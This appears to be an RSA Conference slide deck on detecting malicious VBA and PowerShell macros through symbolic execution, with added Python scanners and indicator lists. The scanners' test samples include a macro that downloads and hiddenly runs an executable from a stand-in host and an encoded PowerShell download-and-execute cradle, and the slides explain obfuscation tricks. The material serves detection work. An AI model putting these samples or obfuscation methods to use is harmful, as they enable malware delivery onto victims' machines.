  • 12. #RSAC Case Study 1 – Dridex Campaign 12 Entrypoint – This is where the code starts its execution Non-Linear Code Execution - GoTo jumping to labels
  • 13. #RSAC Case Study 1 – Dridex Campaign 13 COM Object Creation
  • 14. #RSAC Case Study 1 – Dridex Campaign 14 URL De-Obfuscation + Http Request Creation
  • 15. #RSAC Case Study 1 – Dridex Campaign 15 Sending GET request Initializing ADODB object to write file to disk
  • 16. #RSAC Case Study 1 – Dridex Campaign 16 Writing Response Body Data to disk
  • 17. #RSAC Case Study 1 – Dridex Campaign 17 Executing Downloaded File
  • 18. #RSAC Case Study – Anunak/Carbanak 18 Financial APT Only 1 submission to VT Attributed to Anunak Cybergang Final payload VBS/Powershell PE Executable See Full Analysis in Appendix
  • 19. #RSAC The Second Step – Brainstorming 19 Common approaches pros and cons Hooking — Use available source code or patch existing dll/exe — Inserting code that would sink certain expressions — Remove potentially harmful code Taint Analysis / Symbolic Execution — Implement an engine that would emulate the language interpreter — The engine should evaluate each line of code — Instead of invoking potentially harmful expressions it would sink them
  • 20. #RSAC We Have a Winner! 20 Symbolic Execution Pros — Cannot harm the machine in any way (even if we missed something) — We know exactly how it works. NO Reverse Engineering! — Not limited to specific platform/OS Cons — Hard to Implement — Might lack some language functionality
  • 21. #RSAC Symbolic Execution: Double Sweep Method 21 First sweep Global context — Global variables — Code Function declarations External DLL declarations
  • 22. #RSAC Symbolic Execution: Double Sweep Method 22 Second sweep Function code - starts with Entrypoint Follows execution flow Executes stubs instead of built-in language functions Evaluates expressions — Math — String manipulation — Logical expressions (condition evaluation)
  • 23. #RSAC Implementation Details 23 Python PyParsing Dave Beazley’s (Python guru) PLY – Python Lex Yacc — Lex – lexical analysis/tokenizer — Yacc (Yet Another Compiler Compiler) – Syntax Analyzer BNF – Backus Naur Form Where to start  RTFM
  • 24. #RSAC Lexical Analyzer (Tokenizer) 24 Tokens Language keywords Immediate values — Strings — Integer/numeric values — Floating point values — Arrays/compound data-types Identifiers – variable names, function names, object names Operators – math, bitwise, logical, string manipulation * Diagram courtesy of David Beazley
  • 25. #RSAC Syntax Analyzer (Parser) 25 Parses a language syntax according to the tokenized output from the lexer The language syntax/grammar is defined by multiple functions Each function represents a BNF expression and will pass the parsed/extracted values to the next function inline according to the BNF statement * Diagram courtesy of David Beazley
  • 26. #RSAC PLY Lex Example 26 * Diagram courtesy of David Beazley
  • 27. #RSAC PLY Lex Example 27 * Diagram courtesy of David Beazley
  • 28. #RSAC PLY Lex Example 28 * Diagram courtesy of David Beazley
  • 29. #RSAC PLY Lex Example 29 * Diagram courtesy of David Beazley
  • 30. #RSAC PLY Lex Example 30 * Diagram courtesy of David Beazley
  • 31. #RSAC PLY Lex Example 31 * Diagram courtesy of David Beazley
  • 32. #RSAC PLY Lex Example 32 * Diagram courtesy of David Beazley
  • 33. #RSAC PLY Lex Example 33 * Diagram courtesy of David Beazley
  • 35. #RSAC PLY Yacc Example 35 * Diagram courtesy of David Beazley
  • 36. #RSAC PLY Yacc Example 36 * Diagram courtesy of David Beazley
  • 37. #RSAC PLY Yacc Example 37 * Diagram courtesy of David Beazley
  • 38. #RSAC PLY Yacc Example 38 * Diagram courtesy of David Beazley
  • 39. #RSAC PLY Yacc Example 39 * Diagram courtesy of David Beazley
  • 40. #RSAC Engine Design Overview 40 Scoring Blacklist (score++) Whitelist (score--) A higher score -> more malicious If score >= threshold Then isMalicious = True;
  • 41. #RSAC Obfuscation As Heuristics 41 Obfuscation can be a strong indicator for malicious behavior Examples Object returned from function call Object created from function call return value string
  • 42. #RSAC Obfuscation As Heuristics – More Examples 42 More Examples Self modifying code (during runtime) Data read from controls embedded in the document is considered suspicious
  • 44. #RSAC The Age Old Question of FP vs. FN 44 False positives False negatives Decide what works best for you!
  • 45. #RSAC Lessons Learned 45 Challenges Condition evaluation Recursion limit Lessons When in doubt bruteforce! Use the language specification guide as a guideline rather than implementing every language feature that exists
  • 46. #RSAC Apply 46 DIY 1: Develop It Yourself DIY 2: Deploy In Your Organization Network Endpoint Use for your investigations
  • 47. #RSAC Q&A Rotem Salinas Uri Fleyder-Kotler  Uri.Fleyder@rsa.com  @ufleyder  Rotem.Salinas@rsa.com  @rotemsalinas
  • 48. #RSAC VBA Indicators of Suspicious Activity 48 File System Operations COM Objects: Scripting.FileSystemObject, ADODB.Stream Cmd – output redirect/copy/del/move Open builtin function Importing External DLLs - URLMON Network Operations COM Objects: Microsoft.XMLHTTP, WinHttp.WinHttpRequest OS Manipulation Importing External DLLs – KERNEL32 WMI Objects Registry Importing External DLLs – ADVAPI32
  • 49. #RSAC VBA Indicators of Suspicious Activity 49 Enumeration WMI Objects Cmd – net share/net use/ipconfig/environment variables Obfuscation Self Modifying Code Eval CodeModule Obfuscation Beyond Reasonable Doubt 
  • 50. #RSAC VBA Indicators of Suspicious Activity 50 COM Object Creation WMI Objects Creation Self Modifying Code Eval CodeModule Built-In Functions Importing External DLL Obfuscation Beyond Reasonable Doubt 
• 51. VBA – COM Object Creation – Network Activity
Rule of thumb: if your Office documents are communicating, you are in serious trouble
Network activity COM objects (ProgIDs passed to CreateObject): Microsoft.XMLHTTP, MSXML2.SERVERXMLHTTP.6.0, MSXML2.SERVERXMLHTTP, MSXML2.XMLHTTP, WinHttp.WinHttpRequest.5.1, WinHttp.WinHttpRequest, InternetExplorer.Application
• 52. VBA – COM Object Creation – Network Activity
Code examples (shown on slide): Microsoft.XMLHTTP, WinHttp.WinHttpRequest.5.1
• 53. VBA – COM Object Creation – File System Activity
Scripting.FileSystemObject, ADODB.Stream
• 54. VBA – COM Object Creation – Command Execution
WScript.Shell, Shell.Application
• 55. VBA – COM Object Creation – Obfuscation
XStandard.Base64, MSXML2.DOMDocument.3.0, MSXML2.DOMDocument (Base64 decoding through an XML node whose DataType is bin.base64)
• 56. VBA – Built-In Functions
CreateObject – creates a COM object from its ProgID string
GetObject – creates or retrieves a WMI/COM object from a moniker
Eval – covered under self-modifying code
ExecuteGlobal – VBScript specific
CallByName – calls a function/method by its string name
Shell – executes a command
Environ – evaluates environment variables
Kill – deletes a file
Application.Run – calls a function by its string name
• 57. VBA – WMI Object Creation
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
(examples shown on slide)
• 58. VBA – Self-Modifying Code – Code Module
CodeModule – allows modification of the VBA code itself at run time (reached through VBProject.VBComponents(...).CodeModule; requires "Trust access to the VBA project object model")
• 59. VBA – Self-Modifying Code – Eval
Eval – evaluates an expression string and executes the resulting code
ExecuteGlobal – the VBScript equivalent, executing a string as code in global scope
• 60. VBA – Open Built-In Function
Write to a file with the Open built-in statement (Open path For Output As #n, Print #n, Close #n)
• 61. VBA – Importing External DLL
Declare Function ... Lib "<dll>" brings Win32 API functions into the macro (examples shown on slide)
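The catalogue on slides 48 to 61 turns directly into a scanner. The Python below is an added example, not the authors' engine and not code from the deck: it first folds the two string tricks the Dridex appendix calls "obfuscated COM object" creation (Chr() pieces and & concatenation), then looks for CreateObject/GetObject ProgIDs, the winmgmts: moniker, Declare ... Lib imports, the Open statement and the flagged built-ins, and applies the slide 51 rule of thumb (network activity plus a file write or command execution is a download-and-execute chain). The sample macro, the evidence labels and the verdict thresholds are constructed for the demo; counting the urlmon import as both network and file-system activity is a deliberate deviation from the slide 48 table.

```python
"""Static indicator scan for VBA macro source (added example, not the
authors' engine). Categories and indicators follow slides 48-61."""
import re
from collections import defaultdict

# ProgID passed to CreateObject -> category (slides 51-55)
COM_PROGIDS = {
    "microsoft.xmlhttp": "Network", "msxml2.serverxmlhttp.6.0": "Network",
    "msxml2.serverxmlhttp": "Network", "msxml2.xmlhttp": "Network",
    "winhttp.winhttprequest.5.1": "Network", "winhttp.winhttprequest": "Network",
    "internetexplorer.application": "Network", "scripting.filesystemobject": "FileSystem",
    "adodb.stream": "FileSystem", "wscript.shell": "CommandExecution",
    "shell.application": "CommandExecution", "xstandard.base64": "Obfuscation",
    "msxml2.domdocument.3.0": "Obfuscation", "msxml2.domdocument": "Obfuscation",
}
# Built-in functions (slide 56); call-by-string-name hides intent, hence Obfuscation
BUILTINS = {"shell": "CommandExecution", "kill": "FileSystem", "environ": "Enumeration",
            "eval": "Obfuscation", "executeglobal": "Obfuscation", "callbyname": "Obfuscation"}
# Declare ... Lib "<dll>" (slides 48, 61). Slide 48 files urlmon under file system;
# URLDownloadToFile also talks to the network, so it is counted as both here.
DLL_IMPORTS = {"urlmon": ("Network", "FileSystem"), "kernel32": ("OSManipulation",),
               "advapi32": ("Registry",)}

STRING = r'"((?:[^"]|"")*)"'  # VBA literal; a doubled quote is an escaped quote
_CHR = re.compile(r"\bChrW?\$?\(\s*(\d+)\s*\)", re.I)
_CONCAT = re.compile(STRING + r"\s*[&+]\s*" + STRING)
_CREATE = re.compile(r"\b(CreateObject|GetObject)\s*\(\s*" + STRING, re.I)
_DECLARE = re.compile(r"\bDeclare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+\w+\s+Lib\s+" + STRING, re.I)
_OPEN = re.compile(r"^\s*Open\s+.+?\s+For\s+(?:Output|Append|Binary|Random)\b", re.I | re.M)
_BUILTIN = re.compile(r'(?<![.\w])(Shell|Kill|Environ|Eval|ExecuteGlobal|CallByName)(?=\s*[("]|\s+\w)', re.I)
_DYNAMIC = re.compile(r"\bApplication\.Run\b|\.CodeModule\b", re.I)
_ENUM_CMD = re.compile(r"\bnet\s+(?:share|use)\b|\bipconfig\b", re.I)


def fold_strings(src):
    """Brute-force the string obfuscation of the Dridex macros: replace Chr(n) with
    a literal and join "a" & "b" / "a" + "b" until nothing changes. Returns (text, folds)."""
    src, folds = _CHR.subn(lambda m: '"%s"' % ('""' if int(m.group(1)) == 34
                                              else chr(min(int(m.group(1)), 0x10FFFF))), src)
    while True:
        src, n = _CONCAT.subn(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
        if n == 0:
            return src, folds
        folds += n


def scan(src):
    """Return {"verdict": ..., "findings": {category: [evidence, ...]}}."""
    src, folds = fold_strings(src)
    found = defaultdict(set)
    for m in _CREATE.finditer(src):
        name = m.group(2).lower()
        if name.startswith("winmgmts:"):            # WMI moniker (slide 57)
            found["OSManipulation"].add("wmi:" + name)
            found["Enumeration"].add("wmi:" + name)
        elif name in COM_PROGIDS:
            found[COM_PROGIDS[name]].add("com:" + name)
    for m in _DECLARE.finditer(src):
        lib = re.sub(r"\.dll$", "", m.group(1).lower().rsplit("\\", 1)[-1])
        for cat in DLL_IMPORTS.get(lib, ("OSManipulation",)):
            found[cat].add("dll:" + lib)
    for m in _BUILTIN.finditer(src):
        found[BUILTINS[m.group(1).lower()]].add("builtin:" + m.group(1).lower())
    for m in _DYNAMIC.finditer(src):                 # Application.Run, CodeModule
        found["Obfuscation"].add("dynamic:" + m.group(0).lower().lstrip("."))
    if _OPEN.search(src):
        found["FileSystem"].add("stmt:open")
    for m in _ENUM_CMD.finditer(src):
        found["Enumeration"].add("cmd:" + " ".join(m.group(0).lower().split()))
    if folds >= 3:                                   # "obfuscation beyond reasonable doubt"
        found["Obfuscation"].add("string-folds:%d" % folds)
    cats = set(found)
    if "Network" in cats and cats & {"FileSystem", "CommandExecution"}:
        verdict = "malicious"    # download-and-execute chain (slide 51 rule of thumb)
    elif "Network" in cats or len(cats) >= 2:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": {c: sorted(v) for c, v in found.items()}}


# Constructed sample, not the Dridex code; same chain as appendix slides 62-74.
SAMPLE_MACRO = r'''
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal a As LongPtr, ByVal u As String, ByVal f As String, ByVal r As Long, ByVal c As LongPtr) As Long
Sub AutoOpen()
    Dim h As Object, s As Object, w As Object, p As String
    Set w = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
    Set h = CreateObject("Micro" & "soft.XML" & "HTTP")
    h.Open "GET", "http://example.invalid/stage2", False
    h.send
    Set s = CreateObject("ADO" & Chr(68) & "B.Stream")
    s.Open: s.Type = 1
    s.Write h.responseBody
    p = Environ("TEMP") & "\stage2.exe"
    s.SaveToFile p, 2
    Shell p, vbHide
End Sub
'''
```

Running scan(SAMPLE_MACRO) yields the verdict "malicious" with Network (com:microsoft.xmlhttp, dll:urlmon), FileSystem (com:adodb.stream, dll:urlmon), CommandExecution (builtin:shell), Enumeration and OSManipulation (the WMI moniker, builtin:environ) and Obfuscation (string-folds:5). ProgIDs built in variables or through functions other than Chr() are not folded here, which is exactly the gap the slides close by emulating instead of pattern matching.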
• 62. Appendix – Case Study 1 A - Dridex
Entrypoint – this is where the code starts its execution
Non-linear code execution – GoTo jumping to labels
• 63. Appendix – Case Study 1 A - Dridex
COM object creation
• 64. Appendix – Case Study 1 A - Dridex
URL de-obfuscation + HTTP request creation
• 65. Appendix – Case Study 1 A - Dridex
Sending GET request; initializing ADODB object to write file to disk
• 66. Appendix – Case Study 1 A - Dridex
Writing response body data to disk
• 67. Appendix – Case Study 1 A - Dridex
Executing downloaded file
• 68. Appendix – Case Study 1 B - Dridex
Defining globals; entrypoint
• 69. Appendix – Case Study 1 B - Dridex
Create obfuscated COM object
• 70. Appendix – Case Study 1 B - Dridex
Create more obfuscated COM objects
• 71. Appendix – Case Study 1 B - Dridex
Deobfuscate URL and create GET request
• 72. Appendix – Case Study 1 B - Dridex
Send GET request
• 73. Appendix – Case Study 1 B - Dridex
Receive response body and write to file
• 74. Appendix – Case Study 1 B - Dridex
Save to disk; execution
• 75. Appendix – Case Study 2 - Ananuk
Entrypoint; de-obfuscate
• 76. Appendix – Case Study 2 - Ananuk
Beacon and deploy final payload; de-obfuscate
• 77. Appendix – Case Study 2 - Ananuk
Beacon: command & control, phase 1; de-obfuscate
• 78. Appendix – Case Study 2 - Ananuk
Beacon: command & control, phase 2; de-obfuscate
• 79. Appendix – Case Study 2 - Ananuk
Deploy Base64 payload: write the Base64-decoded payload to the temp path, then execute it
• 80. Appendix – Case Study 2 - Ananuk
Analyzing Payload 1: the payload is an icon, used for credibility
It attempts to gain persistence on the victim's machine both through known Autorun registry paths and by creating a scheduled task with the schtasks command
• 81. Appendix – PowerShell Indicators of Suspicious Activity
.NET objects: .NET reflection, Add-Type, New-Object
Win32 API DLL loading
WMI objects: Invoke-WmiMethod
Command execution: Invoke-Command
COM objects: New-Object -Com
• 82. Appendix – PowerShell Obfuscation
Obfuscation methods: Base64, SecureString, custom decoding methods
• 83. PowerShell Techniques - .NET Reflection
Example 1 – LoadWithPartialName
Example 2 – LoadName
• 84. PowerShell Techniques - Add-Type .NET code injection
Creation of a new type/class from .NET source code
Creating an instance of the class and invoking its Start method
• 85. PowerShell Techniques – New-Object
Creating an object instance; in this example a System.Net.WebClient instance is created in order to download a file
• 86. PowerShell Techniques - Invoke-WmiMethod
Using WMI for enumeration and system manipulation; in this case creating a key in the Windows registry
• 87. PowerShell Techniques - DLL loading
Resolving native Win32 API functions: $module = "kernel32.dll", followed by the API function to be resolved
• 88. PowerShell Techniques - New-Object -Com
Similarly to the COM objects in VBA, the same COM objects can be used in PowerShell through this command
• 89. PowerShell Techniques – Obfuscation
Obfuscation methods in PowerShell:
Adding ticks: the backtick is PowerShell's escape character; before a character that has no escape meaning it is simply dropped by the parser, so Ne`w-Ob`ject still runs as New-Object
Mixed lowercase/uppercase (cmdlet and member names are case-insensitive)
String concatenation/manipulation
Get-Command + wildcards + aliases (resolving a cmdlet through a wildcard lookup instead of naming it)
Invoke-Expression
• 90. PowerShell Techniques – Obfuscation - Base64
Base64 using .NET classes ([Convert]::FromBase64String)
CertUtil: executing the certutil tool as a command: certutil -decode encodedInputFileName decodedOutputFileName
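The tick, case, concatenation and Base64 tricks on slides 89 and 90 are why the indicator list on slide 81 cannot be matched with a plain string search. The Python below is an added example, not the authors' engine and not Invoke-Obfuscation: it strips backticks that carry no escape meaning, folds quoted-string concatenation, decodes -EncodedCommand and [Convert]::FromBase64String() literals (recursively, with the depth cap slide 45 recommends), and only then matches the slide 81 indicators case-insensitively across every decoded layer. The two command lines are constructed for the demo and their Base64 is generated in place so the sample stays self-consistent; the set of characters treated as esc
apes after a backtick is an assumption covering PowerShell 5 and 7.

```python
"""Normalise obfuscated PowerShell, then match the indicator catalogue of
slides 81-90 (added example, not the authors' engine or Invoke-Obfuscation)."""
import base64
import re

# A backtick before a character with no escape meaning is dropped by the parser.
# Kept (assumed escape set, PowerShell 5/7): 0 a b e f n r t u v, quotes, $, whitespace.
_TICK = re.compile(r'`(?=[^0abefnrtuv`$"\'\s])', re.I)
# 'a' + "b" -> 'ab', any quote style, repeated until stable
_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")
# powershell -e / -ec / -enc / -EncodedCommand <Base64 of UTF-16LE script>
_ENC = re.compile(r"(?<![\w-])-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)
# [Convert]::FromBase64String('...') with a literal argument
_B64CALL = re.compile(r"""frombase64string\(\s*(['"])([A-Za-z0-9+/=]+)\1\s*\)""", re.I)

INDICATORS = [(re.compile(p, re.I), name) for p, name in (
    (r"\[(?:system\.)?reflection\.assembly\]::load\w*", ".NET reflection (Assembly.Load*)"),
    (r"(?<![\w-])add-type\b", ".NET code injection (Add-Type)"),
    (r"(?<![\w-])new-object\b", "Object creation (New-Object)"),
    (r"(?<![\w-])-com(?:object)?\b", "COM object creation (-Com)"),
    (r"\bdllimport\b|\bgetprocaddress\b|\bgetmodulehandle\b", "Win32 API resolution / DLL loading"),
    (r"(?<![\w-])(?:invoke-wmimethod|get-wmiobject)\b", "WMI (Invoke-WmiMethod)"),
    (r"(?<![\w-])invoke-command\b", "Command execution (Invoke-Command)"),
    (r"(?<![\w-])(?:invoke-expression|iex)\b", "Dynamic evaluation (Invoke-Expression)"),
    (r"\bnet\.webclient\b|\bdownload(?:file|string|data)\b", "Network download"),
    (r"\bfrombase64string\b|(?<![\w-])-e(?:ncodedcommand|nc|c)?\s+[a-z0-9+/=]{16,}", "Base64 encoding"),
    (r"(?<![\w-])(?:gcm|get-command)\s+\S*[*?]", "Get-Command wildcard resolution"),
    (r"(?<![\w-])convertto-securestring\b", "SecureString obfuscation"),
    (r"\bschtasks\b|currentversion\\run\b", "Persistence (scheduled task / Run key)"),
)]


def _bytes_to_text(raw):
    """UTF-16LE when every high byte is zero (what -EncodedCommand and
    [Text.Encoding]::Unicode produce), otherwise single-byte text."""
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def normalize_layer(text):
    """Strip meaningless backticks and fold quoted-string concatenation."""
    text = _TICK.sub("", text)
    while True:
        text, n = _CONCAT.subn(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), text)
        if n == 0:
            return text


def unwrap(text, depth=0, max_depth=5):
    """Normalize and recursively decode the Base64 payloads the text carries.
    Returns every layer, outermost first; depth is capped (slide 45, recursion limit)."""
    layer = normalize_layer(text)
    layers = [layer]
    if depth >= max_depth:
        return layers
    blobs = [m.group(1) for m in _ENC.finditer(layer)] + [m.group(2) for m in _B64CALL.finditer(layer)]
    for blob in blobs:
        try:
            inner = _bytes_to_text(base64.b64decode(blob, validate=True))
        except (ValueError, UnicodeDecodeError):
            continue                 # not really Base64, or not text: leave it alone
        layers.extend(unwrap(inner, depth + 1, max_depth))
    return layers


def analyze(text):
    """Match the slide 81 indicators, case-insensitively, across all layers."""
    layers = unwrap(text)
    hits = {name for layer in layers for pat, name in INDICATORS if pat.search(layer)}
    return {"layers": layers, "indicators": sorted(hits)}


# Constructed samples; the Base64 is generated here so the demo stays self-consistent.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
SAMPLE_ENCODED = ("powershell.exe -NoP -NonI -W Hidden -Enc "
                  + base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii"))
INNER = "Add-Type -TypeDefinition $src -Language CSharp; [Loader]::Start()"
SAMPLE_TICKED = ("$p = ('New-Ob'+'ject'); &$p -Com ('WScr'+'ipt.Shell') | Out-Null; "
                 "Inv`o`ke-E`xpre`ssi`on ([Text.Encoding]::Unicode.GetString("
                 "[Convert]::FromBase64String('"
                 + base64.b64encode(INNER.encode("utf-16-le")).decode("ascii") + "')))")
```

analyze(SAMPLE_ENCODED) reports two layers and flags Base64 encoding, Invoke-Expression, New-Object and a network download, none of which are visible in the raw command line; analyze(SAMPLE_TICKED) additionally surfaces the COM creation and the Add-Type injection hidden inside the inner payload. Variables, -f format strings, -join and SecureString wrapping are deliberately not folded: once a name is assembled at run time, pattern matching stops and the emulation approach of the talk takes over.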
• 91. Case Study 3 – Targeted Spear Phishing Campaign
JavaScript outer script with obfuscated strings
A list of strings including commands and Base64-encoded payloads; each string in the list is reversed
• 92. Case Study 3 – Targeted Spear Phishing Campaign
Deploys 3 PowerShell scripts on the victim's machine
Payload 1 – .NET code injection using Add-Type: creation of a new type/class from .NET code, then creating an instance of the class and invoking its Start method
• 93. Case Study 3 – Targeted Spear Phishing Campaign
Payload 2 – .NET code injection using Add-Type like the 1st payload; imports multiple Win32 API functions through .NET
• 94. Case Study 3 – Targeted Spear Phishing Campaign
Payload 3 – downloads a TOR proxifier as a scheduled task
• 95. Case Study 4 – PowerSploit + Invoke-Obfuscation
Open source projects available on GitHub
PowerSploit includes capabilities such as: shellcode injection, reflective DLL injection, WMI code execution, Mimikatz (NTLM/LM password dump)
Invoke-Obfuscation is a PowerShell code obfuscation framework developed by Daniel Bohannon